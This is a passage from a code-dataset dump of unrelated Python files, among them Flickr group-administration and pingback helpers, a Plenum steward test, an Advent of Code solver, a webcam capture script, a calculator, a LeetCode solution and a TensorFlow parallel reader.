broadcast addresses\n # (first & last IP address of each class)\n \"(?:[1-9]\\d?|1\\d\\d|2[01]\\d|22[0-3])\"\n \"(?:\\.(?:1?\\d{1,2}|2[0-4]\\d|25[0-5])){2}\"\n \"(?:\\.(?:[1-9]\\d?|1\\d\\d|2[0-4]\\d|25[0-4]))\"\n \"|\"\n # host name\n \"(?:(?:[a-z\\\\u00a1-\\\\uffff0-9]-?)*[a-z\\\\u00a1-\\\\uffff0-9]+)\"\n # domain name\n \"(?:\\.(?:[a-z\\\\u00a1-\\\\uffff0-9]-?)*[a-z\\\\u00a1-\\\\uffff0-9]+)*\"\n # TLD identifier\n \"(?:\\.(?:[a-z\\\\u00a1-\\\\uffff]{2,}))\"\n \")\"\n # port number\n \"(?::\\d{2,5})?\"\n # resource path\n \"(?:/\\S*)?\"\n \"$\"\n , re.UNICODE\n )\n return re.match(URL_REGEX, uri_candidate)\n\n\ndef make_link_headers(further_links):\n \"\"\"\n Makes the slightly tircky HTTP Link header, if any\n\n :param further_links: a list of dicts with 'resource', 'rel', & 'anchor' properties, all URIs\n :return: a string\n \"\"\"\n link_header_content = ''\n count = 0\n for further_link in further_links:\n if not is_a_uri(further_link['anchor']):\n raise PingbackFormulationError('Every anchor in a further_links array must be a valid URI')\n else:\n link_header_content += '<' + further_link['resource'] + '>; ' +\\\n 'rel=\"http://www.w3.org/ns/prov#' + further_link['rel'] + '\"; ' +\\\n 'anchor=\"' + further_link['anchor'] + '\",'\n count += 1\n return link_header_content[:-1] # remove last ','\n\n\ndef send_provaq_pingback(pingback_target_uri, uri_list=None, further_links=None):\n \"\"\"\n Generates and posts a PROV-AQ pingback message\n\n Messages formulated according to http://www.w3.org/TR/prov-aq/#provenance-pingback, specifically examples 12, 13 & 14\n :param pingback_target_uri: a URI, to where the pingback is sent\n :param uri_list: a list object of URIs\n :param further_links: a list of dicts with 'resource', 'rel', & 'anchor' properties, all URIs\n :return: True or an error message\n \"\"\"\n import requests\n\n headers = {'Content-Type': 'text/uri-list'}\n\n # if further links is set, iterate through them and create appropriate Link headers\n if further_links is not None:\n headers['Link'] = make_link_headers(further_links)\n\n # join the URIs into a string for the message body\n if uri_list is not None:\n body = '\\n'.join(uri_list) # the standard says CRLF (\\r\\n), not just \\n\n else:\n # if we have no URIs, set the body to None and set a Content-Length header of zero\n body = None\n headers['Content-Length'] = '0'\n\n # send the post, as per http://www.w3.org/TR/prov-aq/\n try:\n r = requests.post(pingback_target_uri, data=body, headers=headers)\n result = (r.status_code == 204)\n if result:\n return [True]\n else:\n return [False, r.content]\n except Exception as e:\n print(str(e))\n return [False, str(e)]\n\n\ndef send_proms_pingback(pingback_target_uri, payload, mimetype='text/turtle'):\n \"\"\"\n Generates and posts a PROMS pingback message\n\n :param pingback_target_uri: a URI, to where the pingback is sent\n :param payload: an RDF file, in one of the allowed formats and conformant with the PROMS pingback message spec\n :param mimetype: the mimetype of the RDF file being sent\n :return: True or an error message\n \"\"\"\n import requests\n\n headers = {'Content-Type': mimetype}\n\n # send the post\n try:\n r = requests.post(pingback_target_uri, data=payload, headers=headers)\n result = (r.status_code == 201)\n if result:\n return [True, r.content]\n else:\n return [False, r.content]\n except Exception as e:\n print(str(e))\n return [False, str(e)]\n\n\ndef generate_proms_msg_from_report(report_graph, entities_uris, pingback_target_uri, report_type='External'):\n if report_type == 'Basic':\n # we can't generate a Pingback message from a Basic report as there are no Entities defined\n raise PingbackFormulationError('A PROMS Pingback message cannot be generated from a PROMS Basic Report')\n elif report_type == 'External':\n # PROMS pingback message requirements (rules) from http://promsns.org/pingbacks/validator/about\n\n # For R1: assume that the Report from PROMS is already valid according to PROV-O\n\n # For R2: add a prov:pingback for each Entity being pingbacked for\n for entity_uri in entities_uris:\n report_graph.add((URIRef(entity_uri), URIRef('http://www.w3.org/ns/prov#pingback'), URIRef(pingback_target_uri)))\n\n # For R3: check that each Entity being pingbacked for is prov:used by the sole Activity\n # No need to check for any other conditions as the sole Actvity in an External Report is guarenteed\n for entity_uri in entities_uris:\n a = report_graph.query('''\n PREFIX prov: \n ASK\n WHERE {\n ?a a prov:Activity ;\n prov:used <''' + entity_uri + '''>\n }\n ''')\n if not a:\n raise PingbackFormulationError('The Entity <' + entity_uri + '> is not prov:used by the Enternal Report\\'s prov:Activity as required by PROMS pingback message rule R2 (see http://promsns.org/pingbacks/validator/about)')\n\n return report_graph.serialize(format='turtle')\n else: # Internal\n print('Internal')\n\n\nclass PingbackFormulationError(Exception):\n def __init__(self, *args):\n # *args is used to get a list of the parameters passed in\n self.args = [a for a in args]","sub_path":"modules/pingbacks/strategy_functions.py","file_name":"strategy_functions.py","file_ext":"py","file_size_in_byte":21313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"111744516","text":"import pytest\n\nfrom plenum.common.constants import STEWARD\nfrom plenum.test.helper import waitRejectWithReason\nfrom plenum.test.pool_transactions.helper import addNewClient, sendAddNewClient\n\n\n@pytest.fixture(scope=\"module\")\ndef tconf(conf, tdir, request):\n oldThreshold = conf.stewardThreshold\n conf.baseDir = tdir\n conf.stewardThreshold = 5\n\n def reset():\n conf.stewardThreshold = oldThreshold\n\n request.addfinalizer(reset)\n return conf\n\n\ndef testOnlyAStewardCanAddAnotherSteward(looper, txnPoolNodeSet,\n tdirWithPoolTxns, poolTxnClientData,\n steward1, stewardWallet,\n client1, wallet1, client1Connected):\n addNewClient(STEWARD, looper, steward1, stewardWallet, \"testSteward1\")\n\n sendAddNewClient(STEWARD, \"testSteward2\", client1, wallet1)\n for node in txnPoolNodeSet:\n waitRejectWithReason(looper, client1,\n 'Only Steward is allowed to do these transactions',\n node.clientstack.name)\n\n\ndef testStewardsCanBeAddedOnlyTillAThresholdIsReached(looper, tconf,\n txnPoolNodeSet,\n tdirWithPoolTxns,\n poolTxnStewardData,\n steward1, stewardWallet):\n addNewClient(STEWARD, looper, steward1, stewardWallet, \"testSteward3\")\n\n sendAddNewClient(STEWARD, \"testSteward4\", steward1, stewardWallet)\n for node in txnPoolNodeSet:\n waitRejectWithReason(looper, steward1,\n 'New stewards cannot be added by other '\n 'stewards as there are already {} '\n 'stewards in the system'.format(tconf.stewardThreshold),\n node.clientstack.name)\n","sub_path":"plenum/test/pool_transactions/test_adding_stewards.py","file_name":"test_adding_stewards.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"16442145","text":"import fileinput\nimport re\nfrom copy import deepcopy\nfrom typing import List\n\n\ndef replace_item_in_list(lst, old, new):\n return [new if val == old else val for val in lst]\n\n\ndef has_integer_values(rule_dict):\n return {key: value for key, value in rule_dict.items()\n if type(value) is list and any([i for i in value if type(i) == int])}\n\n\ndef simplify_str_list(rule_dict, strings_dict):\n # print(strings_dict)\n for key, values in rule_dict.items():\n # if key == 0:\n # print(values)\n if not strings_dict.get(key, False) and all([True if type(v) == str else False for v in values]):\n strings_dict[key] = f'({\"\".join(values)})'\n rule_dict[key] = f'({\"\".join(values)})'\n # rule_dict.pop(key)\n # else:\n # strings_dict[key] = values\n return strings_dict, rule_dict\n\n\ndef fill_in_rules(rule_dict):\n new_rule_dict = deepcopy(rule_dict)\n new_rule_dict = dict(sorted(new_rule_dict.items(), key=lambda item: item))\n actual_strings = {key: value for key, value in rule_dict.items() if type(value) == str}\n has_integers = True\n while has_integers:\n for rule_nr, actual_s in actual_strings.items():\n new_rule_dict = {key: replace_item_in_list(values, rule_nr, actual_s)\n if type(values) is list else values\n for key, values in new_rule_dict.items()\n }\n actual_strings, new_rule_dict = simplify_str_list(new_rule_dict, actual_strings)\n has_integers = has_integer_values(new_rule_dict)\n print(actual_strings.items())\n # print(new_rule_dict)\n # if has_integers:\n # actual_strings = {key: value for key, value in new_rule_dict.items() if type(value) == str}\n return actual_strings\n\n\ndef check_rule(rule_zero, messages):\n total = 0\n exact_rule = '^' + rule_zero + '$'\n print(exact_rule)\n for message in messages:\n if re.match(exact_rule, message):\n total += 1\n return total\n\n\ndef process(input_list: List):\n \"\"\"\n\n :param input_list:\n :return:\n \"\"\"\n total = 0\n rule_dict = {}\n index = 0\n line = input_list[index]\n while line:\n line_number = int(line.split(':')[0])\n rule = line.split(':')[1]\n if '\"' in rule:\n rule_dict[line_number] = re.findall('\"([a-z])\"', rule)[0]\n # elif '|' in rule:\n # rule = rule.replace(' ', '')\n # or_rule = re.findall('([0-9]+)\\|([0-9]+)', rule)[0]\n # or_rule = [[int(i) for i in list(n)] for n in or_rule]\n # rule_dict[line_number] = or_rule[0] + ['|'] + or_rule[1]\n else:\n rule_dict[line_number] = [int(i) if i != '|' else i for i in rule.strip().split(' ')]\n index += 1\n line = input_list[index]\n\n index += 1\n messages = input_list[index:]\n\n return rule_dict, messages\n\n\nif __name__ == '__main__':\n lines = [i.strip('\\n') for i in fileinput.input()]\n print(lines[0:10])\n rules, mess = process(lines)\n print(f'Output: {rules}, \\n{mess}')\n filled = fill_in_rules(rules)\n print(f'filled: {filled}')\n count_matches = check_rule(filled[0], mess)\n print(f'matched rule zero: {count_matches}')\n","sub_path":"src/19_1_match_message_rule.py","file_name":"19_1_match_message_rule.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"607267129","text":"# coding:utf-8\n'''\npython想操作摄像头,\nVideoCapture是windows特有的,\nlinux要用opencv才行。\n'''\nimport time\nimport cv2\nimport numpy as np\n\"\"\"\n函数名:cv2.VideoCapture()\n功 能:通过摄像头捕获实时图像数据\n返回值:有\n参数一:摄像头代号,0为默认摄像头,笔记本内建摄像头一般为 0\n 或者填写视频名称直接加载本地视频文件\n\"\"\"\ndef camera():\n cap = cv2.VideoCapture(0)#创建一个 VideoCapture 对象\n #filepath = '../image/'\n pngname = time.strftime('%Y%m%d-%H%M%S')+'.png'\n filepath = 'image/'+pngname #必须在当前文件夹下新建image文件夹\n \n while(1):\n # get a frame\n ret, frame = cap.read()\n # 窗口显示,显示名为 Capture\n cv2.imshow(\"capture\", frame)\n #每帧数据延时 1ms,延时不能为 0,否则读取的结果会是静态帧\n if cv2.waitKey(1) & 0xFF == ord('q'):\n cv2.imwrite(filepath, frame)\n \n break\n\n cap.release()#释放摄像头\n cv2.destroyAllWindows()#删除建立的全部窗口\n return filepath\n\n\nif __name__=='__main__':\n camera()\n","sub_path":"prph/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"270986177","text":"def is_number(input):\n\ttry:\n\t\treturn int(input);\n\texcept:\n\t\treturn None;\n\t\t\ndef is_valid_operator(operator):\n\treturn operator in [\"+\", \"-\", \"/\", \"*\"];\n\t\ndef ask_for_a_number(forceValidInput = True):\n\tuser_input = input(\"Podaj liczbe: \");\n\tcasted_value = is_number(user_input);\n\tif forceValidInput:\n\t\twhile casted_value == None:\n\t\t\tuser_input = input(\"Podaj liczbe: \");\n\t\t\tcasted_value = is_number(user_input);\n\treturn casted_value;\n\t\ndef ask_for_an_operator(forceValidInput = True):\n\tuser_input = input(\"Podaj operator: \");\n\tif forceValidInput:\n\t\twhile not is_valid_operator(user_input):\n\t\t\tuser_input = input(\"Podaj operator: \");\n\t\treturn user_input;\n\telse:\n\t\tif not is_valid_operator(user_input):\n\t\t\treturn None;\n\t\telse:\n\t\t\treturn user_input;\n\t\t\ndef calculate(operand1, operator, operand2):\n\tif operand1 == None or operator == None or operand2 == None:\n\t\treturn None;\n\tif operator == \"+\":\n\t\treturn operand1 + operand2;\n\telif operator == \"-\":\n\t\treturn operand1 - operand2;\n\telif operator == \"*\":\n\t\treturn operand1 * operand2;\n\telif operator == \"/\":\n\t\tif operand2 == 0:\n\t\t\tprint(\"Error divison by zero\");\n\t\t\treturn None;\n\t\telse:\n\t\t\treturn operand1 / operand2;\n\telse:\n\t\treturn None;\ndef simple_calculator():\n\tend_cond = True;\n\twhile end_cond:\n\t\tprint(\"Podaj operand1\");\n\t\toperand1 = ask_for_a_number(False);\n\t\tif operand1 == None:\n\t\t\tend_cond = False;\n\t\telse:\n\t\t\toperator = ask_for_an_operator(True);\n\t\t\tprint(\"Podaj operand2\");\n\t\t\toperand2 = ask_for_a_number(True);\n\t\t\tresult = calculate(operand1, operator, operand2);\n\t\t\tprint(f\"Result of calculation is: {result}\");\n\t\t\nif __name__ == \"__main__\":\n\tsimple_calculator();","sub_path":"SampleCalculator.py","file_name":"SampleCalculator.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"468204087","text":"# Procedures of script group-admin-report.py\n#\n# Author: Haraldo Albergaria\n# Date : Jan 01, 2018\n#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\n\n###########################################\n# !!! IMPLEMENT THE PROCEDURES HERE !!! #\n# !!! MODIFY ONLY THE ANNOTATED LINES !!! #\n###########################################\n\n\nimport flickrapi\nimport api_credentials\nimport json\nimport time\nimport group_data\nimport data\n\nfrom datetime import datetime\n\nfrom common import getExif\nfrom common import getLensModel\nfrom common import getFocalLength\n\n\n#===== CONSTANTS =================================#\n\napi_key = api_credentials.api_key\napi_secret = api_credentials.api_secret\n\ngroup_id = group_data.group_id\n\nlens_models = group_data.lens_models\nfocal_lengths = group_data.focal_lengths\n\n# Flickr api access\nflickr = flickrapi.FlickrAPI(api_key, api_secret, format='parsed-json')\n\n\n#===== PROCEDURES =======================================================#\n\ndef createRemoveScript(remove_file_name):\n remove_file = open(remove_file_name, 'w')\n remove_file.write('#!/usr/bin/python3\\n\\n')\n remove_file.write('import flickrapi\\n')\n remove_file.write('import json\\n')\n remove_file.write('import procs\\n')\n remove_file.write('import api_credentials\\n\\n')\n remove_file.write('api_key = api_credentials.api_key\\n')\n remove_file.write('api_secret = api_credentials.api_secret\\n\\n\\n')\n remove_file.write('### PHOTOS TO REMOVE:\\n\\n')\n remove_file.close()\n\ndef addReportHeader(report_file_name, html_file_name, group_name, photos_in_report):\n report_file = open(report_file_name,'w')\n report_file.write('+==============================================================================================================================================================================+\\n')\n if photos_in_report > 1:\n report_file.write('| GROUP ADMIN REPORT {0:30.30} {1:>7} PHOTOS ADDED | \\n'.format(group_name, photos_in_report))\n else:\n report_file.write('| GROUP ADMIN REPORT {0:30.30} {1:>7} PHOTO ADDED | \\n'.format(group_name, photos_in_report))\n report_file.write('+==============================================================================================================================================================================+\\n')\n report_file.close()\n\n now = datetime.now()\n report_file = open(html_file_name,'w')\n report_file.write('\\n\\n\\n\\nGroup Admin Report\\n')\n report_file.write('\\n\\n\\n\\n')\n report_file.write('Updated: {}

\\n'.format(datetime.strftime(now, \"%d/%m/%y %H:%M:%S\")))\n report_file.write('+==============================================================================================================================================================================+
\\n')\n if photos_in_report > 1:\n report_file.write('| GROUP ADMIN REPORT {0:30.30} {1:>7} PHOTOS ADDED |
\\n'.format(group_name, photos_in_report).replace(' ',' '))\n else:\n report_file.write('| GROUP ADMIN REPORT {0:30.30} {1:>7} PHOTO ADDED |
\\n'.format(group_name, photos_in_report).replace(' ',' '))\n report_file.write('+==============================================================================================================================================================================+
\\n')\n report_file.close()\n\ndef addPageHeader(report_file_name, html_file_name, page, number_of_pages, photos_per_page):\n report_file = open(report_file_name,'a')\n report_file.write('\\n')\n report_file.write('+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+\\n')\n report_file.write('| Page: {0:>5}/{1:<5} | Photos: {2:5} |\\n'.format(page, number_of_pages, photos_per_page))\n report_file.write('|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|\\n')\n report_file.write('| | PHOTO | OWNER | LENS MODEL | F. LENGTH | DATE ADDED | ACTION |\\n')\n report_file.write('|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|\\n')\n report_file.close()\n\n report_file = open(html_file_name,'a')\n report_file.write('
\\n')\n report_file.write('+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
\\n')\n report_file.write('| Page: {0:>5}/{1:<5} | Photos: {2:5} |
\\n'.format(page, number_of_pages, photos_per_page).replace(' ',' '))\n report_file.write('|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
\\n')\n report_file.write('| | PHOTO | OWNER | LENS MODEL | F. LENGTH | DATE ADDED | ACTION |
\\n'.replace(' ',' '))\n report_file.write('|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
\\n')\n report_file.close()\n\ndef addPhotoToRemove(remove_file_name, page_number, photo_number, photo_id, owner_id, photo_title, photo_owner, lens_model, focal_length):\n remove_file = open(remove_file_name, 'a')\n remove_file.write('# {0},{1} {2}:{3} @{4}'.format(page_number, photo_number, photo_title, lens_model, focal_length))\n remove_file.write('\\n# https://www.flickr.com/photos/{0}/{1}/in/pool-{2}\\n'.format(owner_id, photo_id, group_data.group_alias))\n remove_file.write('procs.removePhoto(api_key, \\'{0}\\', \\'{1}\\', \\'{2}\\', \\'{3}\\')\\n\\n'.format(group_id, photo_id, photo_title.replace(\"\\'\", \"\\\\\\'\"), photo_owner))\n remove_file.close()\n\ndef addPhoto(report_file_name, html_file_name, remove_file_name, pool, page_number, photo_number):\n photo_id = pool['photos']['photo'][photo_number]['id']\n photo_title = pool['photos']['photo'][photo_number]['title']\n photo_owner = pool['photos']['photo'][photo_number]['ownername']\n owner_id = pool['photos']['photo'][photo_number]['owner']\n\n try:\n photo_url = flickr.people.getInfo(api_key=api_key, user_id=owner_id)['person']['photosurl']['_content'] + photo_id\n date_added = pool['photos']['photo'][photo_number]['dateadded']\n except:\n photo_url = ''\n date_added = '0000000000'\n\n try:\n exif = getExif(photo_id, 0)\n lens_model = getLensModel(exif)\n focal_length = getFocalLength(exif)\n except:\n lens_model = 'NO EXIF'\n focal_length = 'NO EXIF'\n\n asian = photo_title.strip(data.eastern_chars)\n no_asian = photo_title.replace(asian,'')\n date = datetime.fromtimestamp(int(date_added)).strftime('%d/%m/%Y')\n\n report_file = open(report_file_name,'a')\n report_file.write('| {0:3} | {1:50.50} | {2:35.35} | {3:40.40} | {4:>10.10} | {5:>10.10} '.format(photo_number+1, no_asian, photo_owner, lens_model, focal_length, date))\n if (not(lens_model in lens_models)) or (not(focal_length in focal_lengths)):\n if lens_model != 'NO EXIF' and focal_length != 'NO EXIF' and lens_model != '' and focal_length != '':\n report_file.write('| REMOVE |\\n')\n addPhotoToRemove(remove_file_name, page_number, photo_number+1, photo_id, owner_id, photo_title, photo_owner, lens_model, focal_length)\n else:\n report_file.write('| REVIEW |\\n')\n else:\n report_file.write('| KEEP |\\n')\n report_file.close()\n\n report_file = open(html_file_name,'a')\n report_file.write('| {0:3} | {1:50.50} | {2:35.35} | {3:40.40} | {4:>10.10} | {5:>10.10} '.format(photo_number+1, no_asian, photo_owner, lens_model, focal_length, date).replace(' ',' '))\n if (not(lens_model in lens_models)) or (not(focal_length in focal_lengths)):\n if lens_model != 'NO EXIF' and focal_length != 'NO EXIF' and lens_model != '' and focal_length != '':\n report_file.write('| REMOVE |
\\n'.format(photo_url).replace(' ',' ').replace('ahref','a href').replace('target', ' target'))\n else:\n report_file.write('| REVIEW |
\\n'.format(photo_url).replace(' ',' ').replace('ahref','a href').replace('target', ' target'))\n else:\n report_file.write('| KEEP |
\\n'.replace(' ',' '))\n report_file.close()\n\ndef addPageFooter(report_file_name, html_file_name):\n report_file = open(report_file_name,'a')\n report_file.write('+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+\\n')\n report_file.close()\n\n report_file = open(html_file_name,'a')\n report_file.write('+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
\\n')\n report_file.write('\\n\\n')\n report_file.close()\n\ndef addLastRemoveRunProcedure(remove_file_name, group_id):\n remove_file = open(remove_file_name, 'a')\n remove_file.write('\\nprocs.writeLastRemoveRun(\\'{0}\\')\\n'.format(group_id))\n remove_file.close()\n\ndef removePhoto(api_key, group_id, photo_id, photo_title, photo_owner):\n try:\n flickr.groups.pools.remove(api_key=api_key, photo_id=photo_id, group_id=group_id)\n print('Removed photo: \\\"{0}\\\" by {1}'.format(photo_title, photo_owner))\n except:\n print('FAILED removing photo: \\\"{0}\\\" by {1}'.format(photo_title, photo_owner))\n\ndef writeLastRemoveRun(group_id):\n try:\n pool = flickr.groups.pools.getPhotos(api_key=api_key, group_id=group_id)\n number_of_photos_after_current_remove = int(pool['photos']['total'])\n last_run = open('last_remove_run.py', 'w')\n last_run.write('number_of_photos = {0}'.format(number_of_photos_after_current_remove))\n last_run.close()\n except:\n pass\n\n","sub_path":"group_admin/files/procs.py","file_name":"procs.py","file_ext":"py","file_size_in_byte":11344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"462462980","text":"# https://leetcode.com/problems/insufficient-nodes-in-root-to-leaf-paths/\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\nfinal_root = None\n\n\ndef drop(node):\n if node.parent is None:\n global final_root\n final_root = None\n return\n if node.parent.left == node:\n node.parent.left = None\n if node.parent.right == node:\n node.parent.right = None\n\n\ndef is_insufficient(node, limit):\n if node is None:\n return True\n if node.left is None and node.right is None:\n if node.sum_from_root < limit:\n drop(node)\n return True\n else:\n if node.left is not None:\n node.left.parent = node\n node.left.sum_from_root = node.left.val + node.sum_from_root\n if node.right is not None:\n node.right.parent = node\n node.right.sum_from_root = node.right.val + node.sum_from_root\n l = is_insufficient(node.left, limit)\n r = is_insufficient(node.right, limit)\n if l and r:\n drop(node)\n return True\n return False\n\n\nclass Solution:\n def sufficientSubset(self, root: TreeNode, limit: int) -> TreeNode:\n global final_root\n root.sum_from_root = root.val\n root.parent = None\n final_root = root\n is_insufficient(root, limit)\n return final_root\n","sub_path":"2020/arjoonn/d2.py","file_name":"d2.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"117668523","text":"# Copyright 2016 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Implements a parallel data reader with queues and optional shuffling.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom tensorflow.python.framework import dtypes as tf_dtypes\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.ops import data_flow_ops\nfrom tensorflow.python.ops import io_ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.platform import gfile\nfrom tensorflow.python.summary import summary\nfrom tensorflow.python.training import input as tf_input\nfrom tensorflow.python.training import queue_runner\n\n\nclass ParallelReader(io_ops.ReaderBase):\n \"\"\"Reader class that uses multiple readers in parallel to improve speed.\n\n See ReaderBase for supported methods.\n \"\"\"\n\n def __init__(self,\n reader_class,\n common_queue,\n num_readers=4,\n reader_kwargs=None):\n \"\"\"ParallelReader creates num_readers instances of the reader_class.\n\n Each instance is created by calling the `reader_class` function passing\n the arguments specified in `reader_kwargs` as in:\n reader_class(**read_kwargs)\n\n When you read from a ParallelReader, with its `read()` method,\n you just dequeue examples from the `common_queue`.\n\n The readers will read different files in parallel, asynchronously enqueueing\n their output into `common_queue`. The `common_queue.dtypes` must be\n [tf.string, tf.string]\n\n Because each reader can read from a different file, the examples in the\n `common_queue` could be from different files. Due to the asynchronous\n reading there is no guarantee that all the readers will read the same\n number of examples.\n\n If the `common_queue` is a shuffling queue, then the examples are shuffled.\n\n Usage:\n common_queue = tf.RandomShuffleQueue(\n capacity=256,\n min_after_dequeue=128,\n dtypes=[tf.string, tf.string])\n p_reader = ParallelReader(tf.TFRecordReader, common_queue)\n\n common_queue = tf.FIFOQueue(\n capacity=256,\n dtypes=[tf.string, tf.string])\n p_reader = ParallelReader(readers, common_queue, num_readers=2)\n\n\n Args:\n reader_class: one of the io_ops.ReaderBase subclasses ex: TFRecordReader\n common_queue: a Queue to hold (key, value pairs) with `dtypes` equal to\n [tf.string, tf.string]. Must be one of the data_flow_ops.Queues\n instances, ex. `tf.FIFOQueue()`, `tf.RandomShuffleQueue()`, ...\n num_readers: a integer, number of instances of reader_class to create.\n reader_kwargs: an optional dict of kwargs to create the readers.\n\n Raises:\n TypeError: if `common_queue.dtypes` is not [tf.string, tf.string].\n \"\"\"\n if len(common_queue.dtypes) != 2:\n raise TypeError('common_queue.dtypes must be [tf.string, tf.string]')\n for dtype in common_queue.dtypes:\n if not dtype.is_compatible_with(tf_dtypes.string):\n raise TypeError('common_queue.dtypes must be [tf.string, tf.string]')\n\n reader_kwargs = reader_kwargs or {}\n self._readers = [reader_class(**reader_kwargs) for _ in range(num_readers)]\n self._common_queue = common_queue\n\n @property\n def num_readers(self):\n return len(self._readers)\n\n @property\n def common_queue(self):\n return self._common_queue\n\n def read(self, queue, name=None):\n \"\"\"Returns the next record (key, value pair) produced by the reader.\n\n The multiple reader instances are all configured to `read()` from the\n filenames listed in `queue` and enqueue their output into the `common_queue`\n passed to the constructor, and this method returns the next record dequeued\n from that `common_queue`.\n\n\n Readers dequeue a work unit from `queue` if necessary (e.g. when a\n reader needs to start reading from a new file since it has finished with\n the previous file).\n\n A queue runner for enqueing in the `common_queue` is automatically added to\n the TF QueueRunners collection.\n\n Args:\n queue: A Queue or a mutable string Tensor representing a handle\n to a Queue, with string work items.\n name: A name for the operation (optional).\n\n Returns:\n The next record (i.e. (key, value pair)) from the common_queue.\n \"\"\"\n\n enqueue_ops = []\n for reader in self._readers:\n enqueue_ops.append(self._common_queue.enqueue(reader.read(queue)))\n\n queue_runner.add_queue_runner(\n queue_runner.QueueRunner(self._common_queue, enqueue_ops))\n\n return self._common_queue.dequeue(name=name)\n\n def num_records_produced(self, name=None):\n \"\"\"Returns the number of records this reader has produced.\n\n Args:\n name: A name for the operation (optional).\n\n Returns:\n An int64 Tensor.\n\n \"\"\"\n num_records = [r.num_records_produced() for r in self._readers]\n return math_ops.add_n(num_records, name=name)\n\n def num_work_units_completed(self, name=None):\n \"\"\"Returns the number of work units this reader has finished processing.\n\n Args:\n name: A name for the operation (optional).\n\n Returns:\n An int64 Tensor.\n \"\"\"\n num_work_units = [r.num_work_units_completed() for r in self._readers]\n return math_ops.add_n(num_work_units, name=name)\n\n\ndef parallel_read(data_sources,\n reader_class,\n num_epochs=None,\n num_readers=4,\n reader_kwargs=None,\n shuffle=True,\n dtypes=None,\n capacity=256,\n min_after_dequeue=128,\n seed=None,\n scope=None):\n \"\"\"Reads multiple records in parallel from data_sources using n readers.\n\n It uses a ParallelReader to read from multiple files in parallel using\n multiple readers created using `reader_class` with `reader_kwargs'.\n\n If shuffle is True the common_queue would be a RandomShuffleQueue otherwise\n it would be a FIFOQueue.\n\n Usage:\n data_sources = ['path_to/train*']\n key, value = parallel_read(data_sources, tf.CSVReader, num_readers=4)\n\n Args:\n data_sources: a list/tuple of files or the location of the data, i.e.\n /path/to/train@128, /path/to/train* or /tmp/.../train*\n reader_class: one of the io_ops.ReaderBase subclasses ex: TFRecordReader\n num_epochs: The number of times each data source is read. If left as None,\n the data will be cycled through indefinitely.\n num_readers: a integer, number of Readers to create.\n reader_kwargs: an optional dict, of kwargs for the reader.\n shuffle: boolean, wether should shuffle the files and the records by using\n RandomShuffleQueue as common_queue.\n dtypes: A list of types. The length of dtypes must equal the number\n of elements in each record. If it is None it will default to\n [tf.string, tf.string] for (key, value).\n capacity: integer, capacity of the common_queue.\n min_after_dequeue: integer, minimum number of records in the common_queue\n after dequeue. Needed for a good shuffle.\n seed: A seed for RandomShuffleQueue.\n scope: Optional name scope for the ops.\n\n Returns:\n key, value: a tuple of keys and values from the data_source.\n \"\"\"\n data_files = get_data_files(data_sources)\n with ops.name_scope(scope, 'parallel_read'):\n filename_queue = tf_input.string_input_producer(\n data_files, num_epochs=num_epochs, shuffle=shuffle, seed=seed,\n name='filenames')\n dtypes = dtypes or [tf_dtypes.string, tf_dtypes.string]\n if shuffle:\n common_queue = data_flow_ops.RandomShuffleQueue(\n capacity=capacity,\n min_after_dequeue=min_after_dequeue,\n dtypes=dtypes,\n seed=seed,\n name='common_queue')\n else:\n common_queue = data_flow_ops.FIFOQueue(\n capacity=capacity, dtypes=dtypes, name='common_queue')\n\n summary.scalar('fraction_of_%d_full' % capacity,\n math_ops.to_float(common_queue.size()) * (1. / capacity))\n\n return ParallelReader(\n reader_class,\n common_queue,\n num_readers=num_readers,\n reader_kwargs=reader_kwargs).read(filename_queue)\n\n\ndef single_pass_read(data_sources, reader_class, reader_kwargs=None,\n scope=None):\n \"\"\"Reads sequentially the data_sources using the reader, doing a single pass.\n\n Args:\n data_sources: a list/tuple of files or the location of the data, i.e.\n /path/to/train@128, /path/to/train* or /tmp/.../train*\n reader_class: one of the io_ops.ReaderBase subclasses ex: TFRecordReader.\n reader_kwargs: an optional dict, of kwargs for the reader.\n scope: Optional name scope for the ops.\n\n Returns:\n key, value: a tuple of keys and values from the data_source.\n \"\"\"\n data_files = get_data_files(data_sources)\n with ops.name_scope(scope, 'single_pass_read'):\n filename_queue = tf_input.string_input_producer(\n data_files, num_epochs=1, shuffle=False, capacity=1, name='filenames')\n reader_kwargs = reader_kwargs or {}\n return 